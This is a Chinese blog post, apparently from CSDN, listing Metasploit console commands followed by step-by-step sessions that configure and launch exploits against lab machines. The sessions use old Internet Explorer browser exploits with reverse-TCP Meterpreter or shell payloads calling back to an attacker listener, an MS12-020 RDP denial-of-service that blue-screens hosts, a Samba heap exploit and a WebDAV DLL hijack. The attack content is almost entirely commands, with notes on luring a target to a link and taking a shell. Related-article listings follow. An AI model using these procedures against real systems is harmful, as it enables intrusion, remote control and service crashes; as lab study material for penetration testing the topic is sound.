Metasploit漏洞利用模块及命令

于 2024-04-24 09:52:23 发布
阅读量463 收藏 5
点赞数 11
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74025111/article/details/138148314
版权

search name:用指定关键字搜索可以利用的漏洞模块

use exploit name:使用漏洞

show options:显示配置选项

set option name option:设置选项

show payloads:回链攻击载荷

show targets 显示目标(os版本)

set TARGET target number(设置目标版本)

exploit(开始漏洞攻击)

sessions -l(列出会话)

sessions -i id(选择会话)

sessions -k id(结束会话)

Ctrl+z(把会话放到后台)

Ctrl+c(结束会话)

show auxiliary(显示辅助模块)

use auxiliary name (使用辅助模块)

set option name option(设置选项)

exploit(运行模块)

通过search scanner可以查看大量的扫描模块

测试漏洞——ms10_002 IE浏览器漏洞实例——browser

msf > use exploit/windows/browser/ms10_002_aurora (使用ms10_002_aurora模块)

msf exploit(ms10_002_aurora) > show options (查看选项)

msf exploit(ms10_002_aurora) > set SRVHOST 192.168.230.1(url地址)

msf exploit(ms10_002_aurora) > set SRVPORT 80(url地址端口)

msf exploit(ms10_002_aurora) > set URIPATH /(网站根,默认就是/)

msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp(反弹载荷)

msf exploit(ms10_002_aurora) > set LHOST 192.168.230.185(payload反弹地址,写本机)

msf exploit(ms10_002_aurora) > set LPORT 1211(监听端口)

msf exploit(ms10_002_aurora) > exploit (开始攻击)

msf exploit(ms10_002_aurora) > [*] Using URL: http://192.168.230.185:80/(生成url,此漏洞是激光漏洞,当我们把链接地址给目标访问,目标访问后就会反弹一个会话给本机)

msf exploit(ms10_002_aurora) > sessions -i(查看目标)

sessions -i 1(选择id为1的主机)

Meterpreter > shell(可以直接拿到主机的shell,然后可以执行系统命令)

测试漏洞——ms10_018  IE浏览器漏洞实例——browser

msf > use exploit/windows/browser/ms10_018_ie_behaviors(使用ms10_018_ie_behaviors模块)

msf exploit(ms10_018_ie_behaviors) > show options (查看选项)

msf exploit(ms10_018_ie_behaviors) > set SRVHOST 192.168.230.1(url地址)

msf exploit(ms10_018_ie_behaviors) > set SRVPORT 80(url端口)

msf exploit(ms10_018_ie_behaviors) > set URIPATH /(网站根)

msf exploit(ms10_018_ie_behaviors) > set payload windows/shell/reverse_tcp(直接反弹shell)

msf exploit(ms10_018_ie_behaviors) > set LHOST 192.168.230.185(监听地址,本机)

msf exploit(ms10_018_ie_behaviors) > set LPORT 5555(监听端口,本机)

msf exploit(ms10_018_ie_behaviors) > exploit (开始攻击,把链接地址给目标访问,目标访问后就会反弹一个会话给本机)

测试漏洞——ms10_046  IE浏览器漏洞实例——browser

msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader (使用ms10_046漏洞)

msf exploit(ms10_046_shortcut_icon_dllloader) > show options (查看选项)

msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.230.1(url地址)

msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVPORT 80(url端口)

msf exploit(ms10_046_shortcut_icon_dllloader) > set URIPATH /(网站根目录)

msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp(反弹载荷)

msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.230.186(回弹监听地址)

msf exploit(ms10_046_shortcut_icon_dllloader) > set LPORT 4444(回弹监听端口)

msf exploit(ms10_046_shortcut_icon_dllloader) > exploit(开始攻击)

测试漏洞——ms12_004  IE浏览器漏洞实例——browser

msf > use exploit/windows/browser/ms12_004_midi (使用ms12_004漏洞)

msf exploit(ms12_004_midi) > set SRVHOST 192.168.230.176(url地址)

msf exploit(ms12_004_midi) > set SRVPORT 80(端口)

msf exploit(ms12_004_midi) > set URIPATH /(网站根)

msf exploit(ms12_004_midi) > set payload windows/meterpreter/reverse_tcp(反弹载荷)

msf exploit(ms12_004_midi) > set LHOST 192.168.230.186(反弹监听地址)

msf exploit(ms12_004_midi) > set LPORT 4545(反弹监听端口)

msf exploit(ms12_004_midi) > show targets (查看受影响的版本)

msf exploit(ms12_004_midi) > set target 3(选择版本id)

msf exploit(ms12_004_midi) > exploit(攻击)

测试漏洞——ms12_020 蓝屏攻击

msf > use auxiliary/scanner/rdp/ms12_020_check(先用ms12_020_check模块扫描是否有漏洞)

msf auxiliary(ms12_020_check) > show options(查看选项)

msf auxiliary(ms12_020_check) > set RHOSTS 192.168.230.0/24(扫描目标网段)

msf auxiliary(ms12_020_check) > set THREADS 50(线程)

msf auxiliary(ms12_020_check) > exploit (扫描后有vulnerable就说明有危险项)

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids(利用ms12_020_maxchannelids漏洞)

msf auxiliary(ms12_020_maxchannelids) > show options(查看选项)

msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.230.129(选择有漏洞的主机)

msf auxiliary(ms12_020_maxchannelids) > set RPORT 3389(端口,可以不写,默认是3389)

msf auxiliary(ms12_020_maxchannelids) > exploit(攻击后蓝屏)

Linux samba漏洞——

msf > use exploit/linux/samba/lsa_transnames_heap (利用lsa_transnames漏洞)

msf exploit(lsa_transnames_heap) > show options(查看选项)

msf exploit(lsa_transnames_heap) > set RHOST 192.168.230.157(目标地址)

msf exploit(lsa_transnames_heap) > set RPORT 445(目标端口)

msf exploit(lsa_transnames_heap) > set payload linux/x86/shell_bind_tcp(反弹荷载)

msf exploit(lsa_transnames_heap) > set LHOST 192.168.230.186(反弹监听地址)

msf exploit(lsa_transnames_heap) > set LPORT 3434(反弹监听端口)

msf exploit(lsa_transnames_heap) > exploit(攻击,由于这个漏洞影响范围只是3.0.20的,我的靶机版本较高,所以攻击失败)

dll注入攻击——

msf > use exploit/windows/browser/webdav_dll_hijacker(使用webdav_dll漏洞)

msf exploit(webdav_dll_hijacker) > show options (查看选项)

msf exploit(webdav_dll_hijacker) > set SRVHOST 192.168.230.176(url地址)

msf exploit(webdav_dll_hijacker) > set SRVPORT 80(url端口)

msf exploit(webdav_dll_hijacker) > set URIPATH /(网站根)

msf exploit(webdav_dll_hijacker) > set payload windows/meterpreter/bind_tcp(反弹载荷)

msf exploit(webdav_dll_hijacker) > set LHOST 192.168.230.186(反弹监听地址)

msf exploit(webdav_dll_hijacker) > set LPORT 4444(反弹监听端口)

msf exploit(webdav_dll_hijacker) > exploit (攻击)

老杨网络之路.
关注
  • 11
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MS10_002漏洞复现
m0_48907714的博客
03-09 2814
MS10_002漏洞复现 漏洞介绍:ms10_002漏洞,它是IE浏览器漏洞,也称“极光漏洞”,可以通过该漏洞获取目标主机的控制权。 00x01 两台虚拟机,一台为kali ip:192.168.72.4 一台为 Windows xp sp3 英文版 ip:192.168.72.6 使用的工具:msfconsole 00x02 打开两台虚拟机,打开kali的msf软件,搜索MS10_002漏洞,找到两个模块 本次复现漏洞为第一个模块exploit/windows/browser/ms10_00
Metasploitable2靶机渗透学习
m0_65712192的博客
05-19 6540
Metasploitable2靶机渗透学习
Metasploit--模块漏洞的查找和选择
u010680986的博客
10-17 2890
一、show的使用 show后面可以接的参数all,exploits,payloads,auxiliary,post,encorders,nops,plugins,info,options 如show payloads可以展示所有的payloads,但是这种展示会把全部列出来,比较费时 二、search的使用 metasploit使用过程中,由于这个框架有太多的内容,如果想单独搜索某一个知道名称的或者知道大致模块的内容,可以使用search 使用search -h可以看到search的帮助..
Metasploit -- 内网渗透(ms10_002)
weixin_41489908的博客
05-28 1359
我们总以为,是生活欠我们一个满意,其实,是我们欠生活一个努力。。。。 ---- 网易云热评 一、漏洞介绍 ms10_002漏洞,它是IE浏览器漏洞,也称“极光漏洞”,可以通过该漏洞获取目标主机的控制权,。 二、攻击过程(目标主机是xp系统) 1、启动msf,搜索ms10_002 search ms10_002 2、选择模块use exploit/windows/browser/ms10_002_aurora 3、设置payload,set payloadwindows/meterpre.
Metasploit——渗透攻击模块(Exploit)
m0_62063669的博客
08-10 3179
开放21,ftp,称为ftp服务器)。A发送某种类型的漏洞利用代码给B,这个漏洞利用代码利用之后,加载payload,在B。-b排除坏字符,-t输出文件格式,-e指定encoder,-i使用5轮,-k线程,-x模板,-f输出文件。exploits漏洞利用的代码,由于B请求A,就作为A的响应报文把漏洞利用代码内容返回给。判断主动还是被动,是看漏洞利用代码,是主动发过去的,还是被动等待客户端连接服务器端而造成客户端漏洞利用。2.本地不侦听端口,反弹连接给A侦听的另外一个端口,连接后,B就把shell给A。..
metasploit实验报告及漏洞利用代码
01-11
而“metasploit漏洞利用代码.rar”文件则很可能包含了实际的漏洞利用脚本。这些代码通常由Ruby编写,直接与Metasploit框架交互。用户可以学习这些代码来理解如何编写和定制自己的exploits。在研究这些代码时,要注意...
Metasploit漏洞实例分析_gobai_vulnerability_信息安全_metasploit_
09-30
它为安全专业人员提供了大量的exploit(漏洞利用模块,使得测试者可以有效地模拟攻击行为,评估系统的安全性。在本篇文章中,我们将探讨Metasploit的基础知识,包括其核心组件、配置方法以及如何进行实例分析。 *...
metasploit-modules:我的metasploit模块
05-23
它的核心是Metasploit框架,该框架包含了大量预编写的模块,这些模块涵盖了各种攻击技术和漏洞利用。"metasploit-modules"指的是Metasploit框架中的模块集合,每个模块都有特定的功能,如扫描、探测、利用漏洞或进行...
metasploit常用渗透命令.zip
09-16
2. **Exploits**:Exploits是利用已知漏洞攻击目标系统的模块。例如,可以使用`search exploit`命令查找特定类型的漏洞,然后通过`use <exploit_name>`选择并配置该模块。 3. **Payloads**:Payload是指攻击成功后...
利用Metasploit进行渗透测试
03-25
2. **漏洞扫描**:Metasploit的`auxiliary/scanner`模块可用于扫描目标系统,查找已知的漏洞。例如,使用`nmap_service`模块进行Nmap扫描结果的解析,或者直接使用`msfconsole`内置的扫描功能。 3. **选择exploit**...
ms10_002(极光漏洞)渗透步骤——MSF搭建钓鱼网站
渗透测试
06-07 2098
本文简单介绍了如何使用metasploit针对ms10_002(极光漏洞)进行渗透测试,仅供学习 测试环境 描述 ip 主机 kali2020 192.168.1.113 目标主机 win xp sp3 192.168.1.106 ①启动msf,搜索ms10_002,使用msf中的exploit攻击模块,设置参数 msf6 > search ms10_002 Matching Modules ================ # Name .
网络安全Metasploit使用
qq_52074678的博客
05-05 3350
1.Metasploit-介绍 Mltasploit框架使Metasploit具有良好的可扩展性,它的控制接口负责发现漏洞,攻击漏洞,提交漏洞,然后通过一些接口加入攻击后处理工具和报表工具。Metaspolit框架可以从一个漏洞扫描程序导入数据,使用关于有洞主机的详细信息来发现可攻击漏洞,然后使用有效载荷对系统发起攻击,有效载荷在发现漏洞之后开发一种可行的攻击方法。其用于提取本地系统密码,安装其他软件或控制硬件的模块,这些功能很像以前的BO2K等工具所具备的功能。 2.Ubuntu安装msf 环境准备
MS10-002补丁按时发布,建议立即安装,防范极光漏洞(KB979352)
weixin_33811961的博客
01-22 206
美国本地时间周四,微软发布了重要的Internet Explorer的累计补丁(MS10-002),总共修复了8个漏洞,其中包括导致Google在内的多家公司被***的漏洞。就是大名鼎鼎的极光零日漏洞(微软漏洞库编号KB9793520)本次安全更新涉及IE5/6/7/8四个版本,问题的严重性包括可以允许远程执行代码,安装该更新后可以消除一系列来自IE的漏洞,并可以减少受***的风险,微软建议客户尽...
metasploit对IE浏览器的极光漏洞进行渗透利用
天元喜羊羊的博客
05-12 4859
msf > use windows/browser/ms10_002_aurora msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ms10_002_aurora) > show op
渗透-基于metasploit的内网渗透- ms10-002漏洞 - ms-15-020漏洞利用及其原理分析
joke_ljh的博客
08-31 4745
渗透-基于metasploit的内网渗透- ms10-002漏洞 - ms-15-020漏洞利用及其原理分析 漏洞利用及其原理分析 在前面已经讲了利用metaspolit工具利用ms08-067漏洞进行的内网渗透,但是假如你要渗透的对象和你不在同一个局域网,那怎么办?你是不可能攻击到内网的主机,那我们可以想办法让它出来,让它出来主动与我们建立连接。 我们可以利用ms10-002漏洞来进行渗透,它是...
Metasploit技术(三)——漏洞利用
Phantom03167的博客
04-07 4814
漏洞利用
Metasploit学习笔记之——用Metasploit模拟谷歌极光攻击
JochenZou的专栏
12-20 6208
Metasploit模拟谷歌极光攻击重现 本攻击重现是简化的一个攻击过程,省略了前期情报搜集阶段中外围信息搜索、主机探测与端口扫描、服务扫描与查点、网络漏洞扫描等工作,目的是在最短的时间内模拟渗透攻击的核心环节,是对后续的复杂网络渗透攻击和网络安全防护所做的前期工作。 1.      准备工作 1.1   攻击路线图 下图为此次实验的攻击路线图,主要实现了
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8349
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
pillow_heif-0.17.0-pp39-pypy39_pp73-macosx_14_0_arm64.whl
最新发布
07-27
基本介绍 名称与起源:Pillow,原名为PIL(Python Imaging Library),但PIL只支持Python 2版本。随着Python 3的普及,Pillow作为PIL的一个分支出现,兼容Python 3并提供更多的功能和改进。 主要功能:Pillow支持多种图像格式的打开、保存、显示以及基本的图像操作和处理,如裁剪、缩放、旋转、翻转、滤镜应用等。 跨平台性:Pillow库可以在不同的操作系统上运行,包括Windows、Linux和MacOS等。 主要功能模块 Pillow库包含多个功能模块,每个模块都提供了特定的图像处理功能。以下是一些常用的模块: Image:用于处理图像文件,提供打开、保存、调整大小、旋转、裁剪、滤镜等功能。 ImageDraw:提供在图像上绘制各种形状(如线条、矩形、圆形)和文本的功能。 ImageFont:用于加载和使用TrueType字体文件,以便在图像上绘制文本时设置字体样式、大小和颜色。 ImageFilter:提供各种滤镜效果,如模糊、锐化、边缘增强等,用于图像增强、特效处理和图像识别等应用。 ImageEnhance:用于调整图像的亮度、对比度、颜色饱和度等参数,使图像更加清晰、明亮或具有特定的调色效果。 高级功能 除了基本的图像处理功能外,Pillow还支持一些高级功能,如色彩空间转换、直方图均衡化等。这些功能可以帮助用户进行更复杂的图像处理和分析。
Metasploit框架详解:Metepreter模块命令应用
渗透攻击模块(Exploits)则用于利用已知的安全漏洞入侵系统,而后渗透攻击模块(Post)则是在成功获得权限后执行的任务,如文件操作、键盘记录等。编码器模块(Encoders)用于混淆payload,以绕过防火墙或IDS的检测...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值